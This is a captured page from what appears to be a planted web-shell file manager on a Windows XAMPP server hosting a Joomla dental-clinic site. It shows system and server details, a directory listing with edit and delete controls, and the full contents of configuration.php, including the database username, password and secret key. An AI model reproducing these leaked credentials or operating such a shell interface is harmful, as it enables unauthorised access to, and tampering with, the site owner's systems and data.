[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
backup
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 administrator
SET
[ DEL ]
📁 alajaji
SET
[ DEL ]
📁 bin
SET
[ DEL ]
📁 cache
SET
[ DEL ]
📁 cli
SET
[ DEL ]
📁 components
SET
[ DEL ]
📁 images
SET
[ DEL ]
📁 includes
SET
[ DEL ]
📁 language
SET
[ DEL ]
📁 latest
SET
[ DEL ]
📁 layouts
SET
[ DEL ]
📁 libraries
SET
[ DEL ]
📁 media
SET
[ DEL ]
📁 modules
SET
[ DEL ]
📁 plugins
SET
[ DEL ]
📁 templates
SET
[ DEL ]
📁 tmp
SET
[ DEL ]
📄 Joomla_3.10.1-Stable-Full_Package (2).tar.bz2
7,822,431 B
SET
[ EDIT ]
|
[ DEL ]
📄 LICENSE.txt
18,092 B
SET
[ EDIT ]
|
[ DEL ]
📄 README.txt
4,816 B
SET
[ EDIT ]
|
[ DEL ]
📄 alajaji.zip
20,767,767 B
SET
[ EDIT ]
|
[ DEL ]
📄 configuration.php
2,031 B
SET
[ EDIT ]
|
[ DEL ]
📄 htaccess.txt
3,700 B
SET
[ EDIT ]
|
[ DEL ]
📄 index.php
1,407 B
SET
[ EDIT ]
|
[ DEL ]
📄 robots.txt
748 B
SET
[ EDIT ]
|
[ DEL ]
📄 web.config.txt
1,859 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: configuration.php
<?php class JConfig { public $offline = '0'; public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.'; public $display_offline_message = '1'; public $offline_image = ''; public $sitename = 'alajaji dental'; public $editor = 'tinymce'; public $captcha = '0'; public $list_limit = '20'; public $access = '1'; public $debug = '0'; public $debug_lang = '0'; public $debug_lang_const = '1'; public $dbtype = 'mysqli'; public $host = 'localhost'; public $user = 'alajajiUser'; public $password = '123123'; public $db = 'alajaji_en'; public $dbprefix = 'jksf6_'; public $live_site = ''; public $secret = 'clDUehVzymvAFx9V'; public $gzip = '0'; public $error_reporting = 'default'; public $helpurl = 'https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&lang={langcode}'; public $ftp_host = ''; public $ftp_port = ''; public $ftp_user = ''; public $ftp_pass = ''; public $ftp_root = ''; public $ftp_enable = '0'; public $offset = 'UTC'; public $mailonline = '1'; public $mailer = 'mail'; public $mailfrom = 'mahmoud.shrouf@cloudsolutions.com.sa'; public $fromname = 'alajaji dental'; public $sendmail = '/usr/sbin/sendmail'; public $smtpauth = '0'; public $smtpuser = ''; public $smtppass = ''; public $smtphost = 'localhost'; public $smtpsecure = 'none'; public $smtpport = '25'; public $caching = '0'; public $cache_handler = 'file'; public $cachetime = '15'; public $cache_platformprefix = '0'; public $MetaDesc = ''; public $MetaKeys = ''; public $MetaTitle = '1'; public $MetaAuthor = '1'; public $MetaVersion = '0'; public $robots = ''; public $sef = '1'; public $sef_rewrite = '0'; public $sef_suffix = '0'; public $unicodeslugs = '0'; public $feed_limit = '10'; public $feed_email = 'none'; public $log_path = '/home/umcbh/public_html/alajaji/administrator/logs'; public $tmp_path = '/home/umcbh/public_html/alajaji/tmp'; public $lifetime = '15'; public $session_handler = 'database'; public $shared_session = '0'; }